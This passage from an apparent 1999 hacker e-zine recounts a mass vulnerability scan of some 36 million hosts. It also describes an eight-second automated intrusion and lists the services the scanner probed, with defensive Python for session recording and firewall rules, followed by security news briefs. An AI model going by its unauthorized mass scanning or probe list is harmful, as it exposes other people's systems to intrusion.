How the NT box was cracked into in the first place is still a mystery. The logs weren't helpful (surprise! surprise!) and the only way we were even able to confirm this had happened was by putting a sniffer on the NT's traffic (following a hunch) and catching those sneaky packets red-handed, transmitting our SSH identification down under. We never liked NT before, being generally suspicious of proprietary blackbox OSes from a company with a long history of poor quality bloatware. But realizing just how helpless we were against an attacker that obviously knew the ins and outs of this can-of-worms OS, the company recognized that NT was a serious security hazard and changed its security policies to keep it as far away from its systems as possible, and this included restricting employees from using it at home to log into the company network (even with SSH).

2. The attacker is using a custom built software penetration agent.

This is only a hypothesis, but is strongly supported by the fact that the entire attack only lasted an incredible 8 seconds! During which the attacker manages to log on (over an employee's SSH account, no less), gain root privileges, backdoor the system, remove any (standard) traces of its activity and log off. And they probably would have gotten away with it too, if it wasn't for those meddling kids! Who thoughtfully installed a crude old tty surveillance-camera hack that trapped IO calls to and from isatty(3) file descriptors, in realtime, saving them to file along with a timestamp for neato it's-almost-as-if-you-were-there playback qualities.

And wow! If there ever was a crack to appreciate for its elegance, simplicity, and efficiency, this was it. First off, this thing is smoking fast! Which puts the likelihood of any manual intervention at square zero. It's also mean and lean.
Forget fumbling with an FTP client, leave that to the slow soft pink-bellied human cracker-weenies; real agents pump files directly through the shell (uuencode(1)'d at one end, uudecode(1)'d at the other). Extending privileges with an army of amateurish recipe-book Bugtraq exploits? I think not! Introducing the super-exploit, an all-in-one security penetration wonder which quickly identifies and exploits any local security vulnerabilities for that wholesome, crispy, UID zero flavor (we were vulnerable to a recent KDE buffer overflow). After promptly confirming its shiny new root privileges, the agent transfers its last archive (a cross between a self-installing feature-rich backdoor and a clean-up-the-mess, we-were-never-here log doctor), executes it and logs off.

After watching the attack on playback (at 1/8 of its original speed) several times over, the standard security-compromise ritual kicked in. We took the affected machine offline, remounted the disks read-only, fired up our trusty filesystem debugger, and slaved away to salvage whatever we could. Luckily, we found the attacker's transferred archives still intact, along with large fragments of the undoctored logs, allowing us to fill in any still-missing details on the blitz attack. At the end of the day, when we finished playing with the cracked machine on loopback, we changed the compromised account's password, restored binary integrity, rebooted the system and put it back on the network, this time running a network dump of all its incoming and outgoing traffic, just to be on the safe side. Whoever they were, they certainly knew what they were doing, and for the most part seemed very good at it. But being determined, clever, and sophisticated just doesn't cut it when you do battle with wizardly foes (that's us) wielding the great powers of the Universe at their command: dumb luck and clinical paranoia.

So who done it??? Could it be ... (A government conspiracy I tell ya'!)
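The "tty surveillance camera" that caught the 8 second session, and the 1/8 speed playback used to study it, are easy to reproduce in userland. The following is an added example, not the hack the article describes (which hooked terminal I/O inside the kernel) and not SSR code: it runs a command under a pseudo-terminal, logs every chunk that reaches the terminal together with a timestamp, and replays the log at a chosen slowdown. The recorded command and the slowdown factor are arbitrary choices for this example; the recorder captures the program's output side only, the keystrokes side would be logged the same way by also tapping stdin.

```python
import os
import pty
import select
import sys
import time


def record_session(argv, timeout=5.0):
    """Run argv under a pty and log what reaches the terminal.

    Returns a list of (seconds_since_start, data) tuples, the same information a
    timestamped tty tap yields.  Recording stops when the program closes its
    terminal or stays silent for `timeout` seconds.
    """
    pid, master = pty.fork()
    if pid == 0:                       # child: become the recorded program
        try:
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)
    log = []
    t0 = time.monotonic()
    while True:
        ready, _, _ = select.select([master], [], [], timeout)
        if not ready:                  # program went silent: stop recording
            break
        try:
            data = os.read(master, 4096)
        except OSError:                # Linux raises EIO once the slave side is closed
            break
        if not data:                   # other platforms report EOF instead
            break
        log.append((time.monotonic() - t0, data))
    os.close(master)
    os.waitpid(pid, 0)
    return log


def session_duration(log):
    """Wall-clock length of the recorded session in seconds (0 for an empty log)."""
    return log[-1][0] if log else 0.0


def replay(log, slowdown=1.0, out=None):
    """Play the log back, sleeping between chunks; slowdown=8 gives 1/8 speed, 0 skips delays.

    Returns the concatenated output so a caller can also inspect the session offline.
    """
    played = []
    last = 0.0
    for stamp, data in log:
        if slowdown:
            time.sleep((stamp - last) * slowdown)
        last = stamp
        if out is not None:
            out.write(data)
            out.flush()
        played.append(data)
    return b"".join(played)


def transcript(log):
    """Flatten a log to text, normalising the CR LF pairs the pty line discipline inserts."""
    return replay(log, slowdown=0).replace(b"\r\n", b"\n").decode("utf-8", "replace")


if __name__ == "__main__":
    # Record a constructed two-step "session" and play it back at 1/8 speed.
    log = record_session(["sh", "-c", "echo logged in; sleep 0.2; echo bye"])
    print("session lasted %.2fs in %d chunks" % (session_duration(log), len(log)))
    replay(log, slowdown=8, out=sys.stdout.buffer)
```

Timestamps are what make the log worth more than a plain transcript: an interactive human leaves gaps of seconds between commands, while an agent like the one described above produces a log whose total duration is a few seconds with near-zero gaps, which is a trivial thing to alert on once sessions are recorded this way.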
Any one of the many press-savvy three letter agencies scrambling for a bigger slice of the US-government funding pie? They've got motive, but are they really sneaky, clue-full and competent enough to take the blame? How about the SIGINT spooks? The NSA (Information superiority for Americans!), or GCHQ (Her Majesty's Intelligence)? Someone working for the Chinese? The KGB? The Russian mob? The giant from Redmond? Elvis and Bigfoot?! Who knows ...

They tried something spooky 2 nights later, when around 4 AM (Japanese time) our network dump captured several pseudo-DNS udp packets originating from a familiar Linux box in a small Australian ISP. We assume they were attempting to communicate with the software they left behind during their brisk first visit. Several minutes pass, and the attempt is followed by a "TCP ping" (a stealthy alternative to an ICMP ping), several more pseudo-DNS udp packets, and silence. To the best of my knowledge, we haven't heard from them since. How discreet.

End of the road

That's it, it's over, on time, 10 days before the new year, 1999. Our success. Scattered across the world, from Japan to Russia, from the Middle East to Mexico to Brazil. We were all awake when the scanners calmed down, within an hour of each other, on Dec 21st, 1998 08:00 GMT. We celebrated the event at "the bunker" (see suffix item 2 for details), a discreet gathering corner where we hang out, meditate, plot, debate, and coordinate cr^H^Hhacking campaigns of mystical lore. Most of the attention (not to mention conversation) concentrated around "iap-results.txt.gz", a humble 6.4 MB compressed (1:8 ratio) textfile which embodied the sum results of our 4 month long effort. In no time, people downloaded local copies of the post, and were reading, grepping, parsing, cross referencing and analyzing this, that and the other. It was unbelievable non-stop fun, the likes of which we had never before and never since enjoyed at the bunker. A very memorable un"real" moment.
It's funny how close the Net can bring a group of people who have never "really" met, who've never "really" seen each other face to face. And it doesn't seem to "really" matter, it's just as "real", as "real" as anything else gets. "real" is really overrated these days anyway, I mean, really. "He's suffering from some sort of reality complex,.. obviously." Friendship, cooperation, common interests, goals and ideals. They're the same here, in this funny netherworld, "cyberspace", as anywhere else. Across the barriers of culture, language and geography. The universality of human kinship, the couple, the pact, the tribe, the organization, the community, gracefully extended into the online domain. It's all about having a medium, connecting people, communicating. Together we are better.

IAP cheat-sheet

BEGIN TIME:             02:00, Dec 01, 1998 GMT
END TIME:               08:00, Dec 21, 1998 GMT
Scanning nodes:         5
Jobs per minute:        250
Scan time:              20.24 days
Vulnerabilities tested: 18
Domain count:           7 three letter domains, 214 national domains (see suffix item 3)
Host count:             36,431,374
Vulnerability count:    730,213
Vulnerable host count:  450,000

Statistical output (the percentages are of the 730,213 vulnerabilities counted, not of hosts scanned; a host with several holes is counted once per hole):

service    | hosts counted | % of total
-----------+---------------+-----------
webdist    |         5,622 |    0.77%
wu_imapd   |       113,183 |   15.5%
qpopper    |        90,546 |   12.4%
innd       |         3,797 |    0.52%
tooltalk   |       190,585 |   26.1%
rpc_mountd |        78,863 |   10.8%
bind       |       132,168 |   18.1%
wwwcount   |        86,165 |   11.8%
phf        |         6,790 |    0.93%
ews        |         9,346 |    1.28%
other      |          ~18K |    2.42%

("other" groups the vulnerabilities which weren't common enough to generate statistics for.)

Conclusions

A global fury of half a billion packets, digital signals zipping back and forth across the planet at the speed of light.
Above the Earth, across the land, under the sea, over satellite microwave, copper wiring, fiberoptics, wireless and undersea cable. Probing cyberspace. Pretty cool, the kind of power information technology puts in our hands these days. Seven hundred thousand vulnerabilities, gaping holes, wounds in the skin of our present and future information infrastructures, our dream for a free nexus of knowledge, a prosperous digital economy, where we learn, work, play and live our lives. Easy pickings, at the fingertips of anyone who follows in our footsteps, friend or foe. These open points of penetration immediately threaten the security of their affiliated networks, putting many millions of systems in commercial, academic, government and military organizations at a high compromise risk. Ironically, the sheer mass of vulnerable hosts on the Internet offers its members a primitive form of protection, that is, in a you-can-eat-the-other-guy school of fish sort of way. Unfortunately, this doesn't work when you're flashing bright colors and look tasty. If you show up when a shark greps your school for "bank", you're in really bad shape. As this is *not* an example. We were stunned to find just how many networks you would expect to be ultra secure were wide open to attack. Banks, billion dollar commerce sites, computer security companies, even nuclear weapon research centers, goddamit! You'd think people would have some good sense and _at least_ patch their systems when an advisory comes out.

"Computers are unreliable, but humans are even more unreliable. Any system which depends on human reliability is unreliable." - Gilb

Looking at the big picture, the problem gets worse. A catastrophe in the works. So far, we've been pretty lucky. Consider the power these insecure networks represent _together_. Penetrating and controlling millions of hosts? You couldn't do it manually, but with the right software, you could automate most of the dirty work.
You'd need a careful network worm (suffix item 4), stealthy remote administration software (suffix item 5) and a self organizing network nervous system by which you could propagate control. Imagine the implications if this sort of capability ever fell into the wrong hands. A government (China perhaps), a political terrorist group or organized crime. On bandwidth alone they could shut down any part (or all) of the Internet in mammoth DoS attacks. A country, a portal, a news site, or maybe just InterNIC. Leverage and attention, for fun and profit. They could "build" the world's largest distributed supercomputer, or construct an Intelligence network rivalled only by the NSA's Echelon. Of course, who says only one group can play the game? Struggles for power in the digital domain could very well develop into the world's first real information war, with the very future of the Internet as a free unregulated supernetwork caught in the cross fire. Unlikely? Far fetched? We hope so. Still, with all the hype Y2K is getting, it seems ludicrous that the most serious _real_ threat to information technology is consistently ignored. The only thing necessary for the triumph of evil is for good men to do nothing. Wake up fellow countrymen. Let's get to work.

Everywhere you go you'll see them searching,
Everywhere you turn you'll feel the pain,
Everyone is looking for the answer,
Well look again.
-- Moody Blues, "Lost in a Lost World"

SUFFIX

[item 1] Vulnerabilities BASS can test for (as of version 1.0.7):

General:
  bind      CA-98.05
  wu_imapd  CA-98.09
  innd      CA-97.08
  qpopper   CA-98.08

RPC:
  rpc.mountd CA-98.12
  tooltalk   CA-98.11

CGI:
  wwwcount phf php handler compas faxsurvey webdist ews glimpse info2www webgais websendmail

[item 2] "the bunker" - a technical reference guide

"The bunker" was hacked together by a friend who noticed how badly the group needed a realtime, secure communication forum. Our configuration combines an unmodified IRC server, SSH, a firewall and a Linux box (or two).
There are two possible implementations, one more secure than the other but also (slightly) more expensive (you'll need another cheap i[345]86 box). We'll start with our (secure) configuration. We take a cheap Linux box (i486, 8MB RAM, 500MB diskspace, two $15 Ethernet cards) with the bare minimum Debian installation, remove any "privilege relays" (network services, daemons (crond), suid files) and configure the kernel _with_ firewall support and _without_ IP forwarding. We then install the SSH suite, and double check to make sure the *only* available network service is sshd's port 22 (ICMP / UDP included). As an additional layer of security, we enforce our SSH-only policy at the OS level, by setting up the kernel's IP firewall to reject *all* incoming and outgoing _Internet_ packet traffic by default, except what we explicitly need to maintain *incoming* SSH sessions.

incoming rules:
  default policy: deny
  accept TCP packets from any source to thebunker.com port SSH(22)

outgoing rules:
  default policy: deny
  accept TCP packets from thebunker.com port SSH(22) to any destination

An example implementation (our ipfwadm(8) bootup configuration):

  #!/etc/ipfw/ipfw-setup
  # * eth0 interfaces the Internet, and eth1 interfaces the private IRC
  #   server.
  #
  # * On 2.2.X kernels and higher the IP firewalling code has been replaced,
  #   so ipfwadm (and this configuration) will no longer work. ipchains(8)
  #   should be used instead.
  #
  # * Since we are not forwarding between interfaces, 0.0.0.0/0 can be used
  #   as a safe (portable) alternative to our IP address. Those of you
  #   who would rather be specific should put their IP here with a mask of 32.
  #   (For example: 208.212.172.33/32)

  ipfwadm -I -f
  ipfwadm -I -p deny
  ipfwadm -I -a accept -W eth1
  ipfwadm -I -a accept -W eth0 -P tcp -D 0.0.0.0/0 22

  ipfwadm -O -f
  ipfwadm -O -p deny
  ipfwadm -O -a accept -W eth1
  ipfwadm -O -a accept -W eth0 -P tcp -S 0.0.0.0/0 22

  ---[ EOF ]---

A simple, airtight firewall.
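As an added example (not part of the article and not the bunker's actual setup), here is the same policy written as a small stateless packet-filter model in Python, so the rule set can be checked against sample packets before it goes on a box. It reproduces the four ipfwadm rules above one for one: everything on eth1 accepted, default deny on eth0 in both directions, TCP to local port 22 accepted inbound, TCP from local port 22 accepted outbound. The sample packets and addresses (RFC 5737 documentation ranges) are constructed for the illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    iface: str          # "eth0" (Internet) or "eth1" (private IRC server)
    direction: str      # "in" or "out", relative to the firewall host
    proto: str          # "tcp", "udp" or "icmp"
    src: str
    sport: int          # 0 for icmp
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    chain: str                       # "I" (input) or "O" (output), as in ipfwadm -I / -O
    action: str                      # "accept" or "deny"
    iface: Optional[str] = None      # -W
    proto: Optional[str] = None      # -P
    sport: Optional[int] = None      # port part of -S
    dport: Optional[int] = None      # port part of -D

    def matches(self, pkt):
        return ((self.iface is None or self.iface == pkt.iface)
                and (self.proto is None or self.proto == pkt.proto)
                and (self.sport is None or self.sport == pkt.sport)
                and (self.dport is None or self.dport == pkt.dport))


class StatelessFilter:
    """First matching rule wins; no match -> the chain's default policy (ipfwadm -p).

    Like ipfwadm and ipchains, this keeps no connection state: each packet is judged
    on its own header fields only.
    """

    def __init__(self, policy):
        self.policy = policy         # e.g. {"I": "deny", "O": "deny"}
        self.rules = {"I": [], "O": []}

    def add(self, rule):
        self.rules[rule.chain].append(rule)

    def verdict(self, pkt):
        chain = "I" if pkt.direction == "in" else "O"
        for rule in self.rules[chain]:
            if rule.matches(pkt):
                return rule.action
        return self.policy[chain]


def bunker_firewall():
    """The ipfwadm configuration from the article, rule for rule."""
    fw = StatelessFilter({"I": "deny", "O": "deny"})
    fw.add(Rule("I", "accept", iface="eth1"))                          # -I -a accept -W eth1
    fw.add(Rule("I", "accept", iface="eth0", proto="tcp", dport=22))   # -I ... -W eth0 -P tcp -D 0.0.0.0/0 22
    fw.add(Rule("O", "accept", iface="eth1"))                          # -O -a accept -W eth1
    fw.add(Rule("O", "accept", iface="eth0", proto="tcp", sport=22))   # -O ... -W eth0 -P tcp -S 0.0.0.0/0 22
    return fw


# Constructed traffic; addresses are from the RFC 5737 documentation ranges.
BUNKER = "192.0.2.33"
MEMBER = "198.51.100.7"
SAMPLES = {
    "ssh_in":        Packet("eth0", "in",  "tcp",  MEMBER, 40000, BUNKER, 22),
    "ssh_reply":     Packet("eth0", "out", "tcp",  BUNKER, 22,    MEMBER, 40000),
    "dns_out":       Packet("eth0", "out", "udp",  BUNKER, 1025,  "203.0.113.53", 53),
    "ping_in":       Packet("eth0", "in",  "icmp", MEMBER, 0,     BUNKER, 0),
    "irc_private":   Packet("eth1", "out", "tcp",  "10.0.0.1", 1234, "10.0.0.2", 6667),
    # The hole a stateless filter leaves: any local process that binds source port 22
    # can talk to the Internet, no inbound SSH connection required.
    "sport22_egress": Packet("eth0", "out", "tcp", BUNKER, 22, "203.0.113.9", 4444),
}


def audit(fw=None):
    """Verdict for every sample packet, keyed by sample name."""
    fw = fw or bunker_firewall()
    return {name: fw.verdict(pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in audit().items():
        print("%-15s %s" % (name, verdict))
```

The last verdict is the caveat to keep in mind before calling the rule set airtight: "from port 22" in a stateless filter means any TCP segment with source port 22, whether or not it belongs to an SSH session someone opened from outside. On this box the exposure is small, since only root can bind a port below 1024 and only sshd does, so the path is usable only after root is already lost; a filter with connection tracking (ipchains has none, iptables does) closes it outright.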
One interface faces the Internet, and the other jacks straight into the safehouse (our IRC server), which should *not* be capable of accessing the Internet directly, and vice versa. The safehouse is a similarly configured bare-metal, secure Linux configuration running _only_ ircd (_not_ as root!) and sshd. General purpose use of the safehouse is strongly discouraged. User accounts on the firewall are opened for authorized members of the group, but despite trusting the system's users, access to the administrative account must be strictly limited. This is to insulate the system from the possible security problems of its users, with the added benefit of protecting a user from coercion (they couldn't compromise security if their life depended on it).

The second configuration may be less secure, depending on your risk model, but is also less expensive. You would only need one Linux box and one Ethernet card. We eliminate the "safehouse" and trust the firewall to run the ircd server safely on loopback (_not_ as root!), while isolating it from the Internet. In this case, the security of the system _depends_ on correctly enforcing the strict IP firewall filters; they are no longer merely an additional layer of security. Because we are running a service on loopback, the IP firewall must be set up to allow packets to and from the server on the local interface. While this setup is theoretically secure "enough", it leaves a larger margin for error and malice.

In a nostalgic tribute to the old BBS days, "the bunker" features a black and white (green), menu driven default login shell (based on pdmenu), which greets users with the message of the day, announces events, and offers a consistent customizable UI to local mail, project forums, IRC (directly into the official, often the only, system channel), and an ever growing list of other system activities. ("just one more feature"!)
The interface started out as a joke, and while it sounds out of date, with the current explosion of graphics, sound and video on the WWW, it's oddly cozy, and most of us have warmed up to it. (besides, when real work needs to get done, reaching emacs (or a shell) is just a key-press away)

[item 3] domains scanned

7 three letter domains:
  com - Commercial
  net - Networks
  edu - Educational
  mil - US Military
  org - Organizations
  gov - Government
  int - International Organizations

214 national domains (sorted by size, left to right, top down):

jp (Japan) us (United States) uk (United Kingdom) de (Germany) ca (Canada) au (Australia) nl (Netherlands) fi (Finland) fr (France) se (Sweden) it (Italy) no (Norway) tw (Taiwan, Province Of China) dk (Denmark) es (Spain) ch (Switzerland) br (Brazil) kr (Korea, Republic) be (Belgium) ru (Russian Federation) za (South Africa) at (Austria) nz (New Zealand) mx (Mexico) pl (Poland) il (Israel) hu (Hungary) hk (Hong Kong) cz (Czech Republic) sg (Singapore) ar (Argentina) ie (Ireland) gr (Greece) pt (Portugal) my (Malaysia) tr (Turkey) cl (Chile) ee (Estonia) is (Iceland) th (Thailand) su (Soviet Union) sk (Slovakia, Slovak Republic) ae (United Arab Emirates) si (Slovenia) cn (China) ro (Romania) co (Colombia) ua (Ukraine) id (Indonesia) uy (Uruguay) in (India) lv (Latvia) lt (Lithuania) ph (Philippines) ve (Venezuela) bg (Bulgaria) hr (Croatia 'Hrvatska') yu (Yugoslavia) lu (Luxembourg) kw (Kuwait) do (Dominican Republic) pe (Peru) cy (Cyprus) nu (Niue) cr (Costa Rica) pk (Pakistan) na (Namibia) lb (Lebanon) tt (Trinidad And Tobago) eg (Egypt) kg (Kyrgyzstan) to (Tonga) gl (Greenland) pr (Puerto Rico) ec (Ecuador) kz (Kazakhstan) bm (Bermuda) bn (Brunei Darussalam) py (Paraguay) zw (Zimbabwe) mt (Malta) gt (Guatemala) sv (El Salvador) cc (Cocos 'Keeling' Islands) cx (Christmas Island) pa (Panama) by (Belarus) ni (Nicaragua) ge (Georgia) ke (Kenya) om (Oman) bw (Botswana) bo (Bolivia) fo (Faroe Islands) bh (Bahrain) mu (Mauritius) ma
(Morocco) lk (Sri Lanka) ad (Andorra) mk (Macedonia, Former Yugoslav) md (Moldova, Republic) bs (Bahamas) vi (Virgin Islands, US) ng (Nigeria) am (Armenia) ba (Bosnia And Herzegowina) jo (Jordan) ky (Cayman Islands) li (Liechtenstein) jm (Jamaica) sa (Saudi Arabia) gi (Gibraltar) zm (Zambia) pf (French Polynesia) sz (Swaziland) tm (Turkmenistan) bz (Belize) mc (Monaco) ir (Iran, Islamic Republic) ci (Cote D'Ivoire) uz (Uzbekistan) sm (San Marino) ai (Anguilla) fj (Fiji) sn (Senegal) gh (Ghana) bf (Burkina Faso) ag (Antigua And Barbuda) fm (Micronesia, Federated States) az (Azerbaijan) gp (Guadeloupe) np (Nepal) dm (Dominica) mo (Macau) mz (Mozambique) tz (Tanzania, United Republic) pg (Papua New Guinea) st (Sao Tome And Principe) ug (Uganda) nc (New Caledonia) gf (French Guiana) tg (Togo) mv (Maldives) gu (Guam) al (Albania) hn (Honduras) im (Isle of Man) aw (Aruba) cu (Cuba) vu (Vanuatu) tc (Turks And Caicos Islands) et (Ethiopia) tj (Tajikistan) hm (Heard And Mc Donald Islands) gy (Guyana) tn (Tunisia) mg (Madagascar) kh (Cambodia) ac (Ascension Island) as (American Samoa) nf (Norfolk Island) aq (Antarctica) io (British Indian Ocean Territory) ck (Cook Islands) bb (Barbados) gb (United Kingdom) je (Jersey) mq (Martinique) sh (St. 
Helena) bt (Bhutan) vn (Viet Nam) ms (Montserrat) lc (Saint Lucia) dz (Algeria) vg (Virgin Islands, British) ye (Yemen) sb (Solomon Islands) mn (Mongolia) ls (Lesotho) gg (Guernsey) ne (Niger) mr (Mauritania) mp (Northern Mariana Islands) gw (Guinea-Bissau) sl (Sierra Leone) qa (Qatar) tf (French Southern Territories) bj (Benin) va (Vatican City State) cd (Congo, Democratic Republic) an (Netherlands Antilles) km (Comoros) sc (Seychelles) gs (South Sandwich Islands) kn (Saint Kitts And Nevis) ly (Libyan Arab Jamahiriya) pn (Pitcairn) gd (Grenada) cm (Cameroon) tp (East Timor) mh (Marshall Islands) ws (Samoa) um (United States Minor Outlying Islands) tv (Tuvalu) sy (Syrian Arab Republic) re (Reunion) pw (Palau) mw (Malawi) mm (Myanmar) ml (Mali) lr (Liberia) cv (Cape Verde) cg (Congo, Republic) af (Afghanistan)

[item 4] Lukemia

One of our first research projects (circa 1997) involved researching possible designs of a modern network worm. We even developed a prototype in C which implements some of our ideas. Today, we're pretty horrified by our choice of language (in C, everything is equally difficult; "help save the world!" -- use Perl) and the quality of the code (butt ugly).

[item 5] Portacelo

"Local security subversion. Why human and (current) software (tripwire and others) host-based Intrusion Detection Systems are a bad idea." We did some research (right after the IAP was over) on this subject, and plan to release an article sometime in the near future. A fully-featured backdoor implementation is available, demonstrating the concept, which combines SSH ESP (suffix item 6), a kernel module, direct memory manipulation, and a good old fashioned binary trojan.

[item 6] SSH ESP

A hacked SSH suite modified to implement ESP (Encapsulated encrypted STREAMS Protocol) at the application level. Notable features include:

  - piercing almost any current filter firewall (ab-uses any available packet traffic: tcp, udp and icmp)
  - invisible at the operating system level (netstat and friends will not register any activity)
  - practical (ESP is almost as fast and reliable as TCP, including error correction)
  - military strength encryption (thanks to SSH)

[item 7] Note to the reader

Christ, it took me, Liraz, over 2 weeks to write this silly article, during which I had to drop whatever I was doing, and devote the bulk of my time to writing this memorandum of the IAP in English, which is not my native language. (Disclaimer: Please excuse any errors in syntax, grammar or spelling. That felt good. Please forgive my bad writing, distasteful dramatics, poor sense of humor... I'll stop now...) In the process I had to convince my fellow project associates (some of them very strong willed) that documenting the IAP was A Good Thing, at least for posterity's sake... And all so I could offer you, dear reader, a chance to share some of my humble insights on computer security, and a taste of hacker culture. This is my first publication, and I'm not too sure how this is going to be received. Frankly, I prefer writing code, so I'm not sure I'll be writing any more articles soon. Whether or not that happens depends on the response I get from interested readers. If there is a good response, there will be more. But goddammit, they'll be shorter this time! I hope the article wasn't too technical for your tastes, but the project was mostly about overcoming technical and logistical difficulties, so that was hard to escape. Also, I am very short on time and resources, so if anyone is interested in sponsoring the material (an official SSR website for the rant and the software), that would be great. Oh, any takers on the IDDN front? We can start out with a (preferably archived) mailing list, find some interested people, get the ball rolling...
All points of contact: liraz@bigfoot.com

@HWA

32.0 TCS Web Page Defacer Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dioxin
A 15-year old has pleaded guilty to defacing the web pages of two Television Corporation of Singapore (TCS) web sites. The defacement occurred back in June. The infocriminal will be sentenced soon for four counts of unauthorized entry and the disclosure of passwords. The individual made several guesses at the login/password and eventually hit upon a combination that worked, "news/news". (And no sanctions against TCS for having weak/no security)

The Strait Times
http://straitstimes.asia1.com.sg/cyb/cyb1_0813.html
HNN Archive for June 18
http://www.hackernews.com/arch.html?061899#4
(Strait Times article provided a 404)

@HWA

33.0 Cybercrime On the Rise in Russia - First Offender Convicted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lionel
The Russian Home Office has detected more than 100 IT related offenses since the beginning of the year. Russia has convicted its first computer related offender: an 18 year old student who stole $11,000 from a US company by selling its products over the Internet has been sentenced to 5 months in jail.

Yahoo - French
http://www.yahoo.fr/actualite/19990812/multimedia/934457760-yaho140.120899.133648.html

Thursday 12 August 1999, 13:36

Nearly 100 computer crimes detected in Russia in 7 months

MOSCOW, 12 August (AFP) - The Russian Interior Ministry has detected nearly 100 cases of computer fraud since the beginning of the year, the Itar-Tass news agency reported on Thursday. "Russia had to start tackling this problem after break-ins into computer systems abroad carried out from Russia," commented Vladislav Selivanov, head of the computer fraud unit, created a year ago.
Computer fraud in all its forms has risen recently in Russia because of the economic crisis, according to Sergei Gruzdev, director of the company Aladdin, which produces protection systems for software. "The losses we have uncovered recently amount to several hundred dollars a day, but the real figures are far larger," he estimated. The first conviction of a computer hacker in Russia took place in November in Moscow: an 18-year-old Russian student who had swindled 11,000 dollars from an American company selling its products over the Internet was given a 5 year suspended prison sentence.

neo/fd t

@HWA

34.0 ToorCon Less Than One Month Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by skalore
The first annual ToorCon is set to take place in less than one month, on September 3rd-4th, at the Price Center in The University of California, San Diego. ToorCon is San Diego's only comprehensive computer security conference, and will feature lectures on topics such as IDS, stack-based buffer overflows, secure remote communications, and more. ToorCon will also feature staff members from Attrition.org and reporters from the San Diego Union Tribune. And of course, after the day's lectures, San Diego's friendly neighbor to the south, Mexico, is available 24 hours, for partying and fun.

HNN Cons page
http://www.hackernews.com/cons/cons.html

@HWA

35.0 FRESHMEAT.NET BOUGHT
~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Saturday 14th August 1999 on 9:51 pm CET

It looks like Linux related sites are interesting for acquisition. After buying the Slashdot web site (www.slashdot.org), Andover.net bought the well known FreshMeat (www.freshmeat.net). Plans for this site are the same as for Slashdot - Andover.net will earn money from selling advertising space.
@HWA

36.0 LINUXPPC CRACK-CONTEST FINISHED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 8:20 pm CET

The LinuxPPC crack-the-box contest has come to an early end. No one has made a successful attempt yet, but the organization of the contest decided to stop it for the following reasons: "Although it is interesting to have all of you try to break into the machine here, there are some problems that we found with that method. 1) Waste of bandwidth, 2) Waste of a useful machine that is supposed to go to AbiSource, 3) People are not following the rules anymore: Instead of breaking into our machine, they have started to piss off the ISP and other customers because they are trying to break into other machines. Please note: This is an illegal activity and out of our hands. If you are doing this and continue to, the normal process of prosecuting such action will occur. 4) Because so many people are trying, interesting attacks are difficult to perform."

@HWA

37.0 INFOSEEK HACKED
~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Saturday 14th August 1999 on 5:52 pm CET

Today Infoseek (infoseek.go.com) was hacked. As Attrition collects defaced mirrors for archiving, they noticed on this hack: "infoseek.go.com received an interesting hack of sorts. Attempting to search for anything would potentially yield a defaced page. The person reporting the hack to the Attrition staff received it after 5 searches. We tested it and received the defaced page on the first search attempt. This page stands out in comparison with their normal pages".
Mirror of the defacement here: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/Titles.html

@HWA

38.0 HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 6:00 am CET

FreeS/WAN is an open-source software package for Linux based servers that uses strong encryption to create secure data tunnels between any two points on the internet. It uses the IPsec protocol, an interoperable global standard for securing IP connections. The software generated strong interest among the 1,800 hackers who attended the Chaos Communication Camp, the Chaos Computer Club's first international hacker conference held outside Berlin last weekend. Here are some opinions on it.

@HWA

39.0 TRINUX 0.62 RELEASED
~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:40 am CET

Trinux is a portable Linux distribution that boots from 2-3 floppies (or a FAT16 partition) and runs entirely in RAM. Trinux contains the latest versions of popular network security tools and is useful for mapping and monitoring TCP/IP networks. Trinux transforms an ordinary x86 PC into a powerful network (security) management workstation without modifying the underlying hardware or operating system. Get it here: http://www.trinux.org

@HWA

40.0 GOVERNMENT FACES SECURITY SKILLS SHORTAGE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:20 am CET

The US federal government is facing a tremendous shortage of people needed to fight future cyberwars. Over the next seven years, the government will have to replace more than 32,000 information technology workers -- almost half of the 71,000 IT workers employed by federal agencies, according to a recent study by the federal Chief Information Officers Council.
Of most concern is the need for IT employees with information security skills, according to a recent federal report urging the creation of a massive intrusion-detection system to protect federal and critical private systems, such as energy, telecommunications and transportation, against cyberattack.

Computerworld (Online News, 08/12/99 05:34 PM)
Government faces security skills shortage
By Patrick Thibodeau

WASHINGTON -- Federal officials are looking at ways to prevent an "electronic Pearl Harbor" -- a sneak cyberattack. But in a situation somewhat parallel to the plight of the undermanned and unprepared military in 1941, the federal government is facing a tremendous shortage of people needed to fight any future cyberwar.

Over the next seven years, the government will have to replace more than 32,000 information technology workers -- almost half of the 71,000 IT workers employed by federal agencies, according to a recent study by the federal Chief Information Officers Council. Much of the turnover is the result of a rise in the number of employees eligible for retirement.

Of most concern is the need for IT employees with information security skills, according to a recent federal report urging the creation of a massive intrusion-detection system to protect federal and critical private systems, such as energy, telecommunications and transportation, against cyberattack.

The national cyber protection plan recommends funding information security programs at universities and offering scholarships to students in exchange for a commitment to work at federal agencies. Such programs may ultimately benefit private companies.

Only a handful of universities now offer programs in information security. "Security hasn't made it into the mainstream of academe," said Lance J. Hoffman, a professor of computer science at George Washington University in Washington.
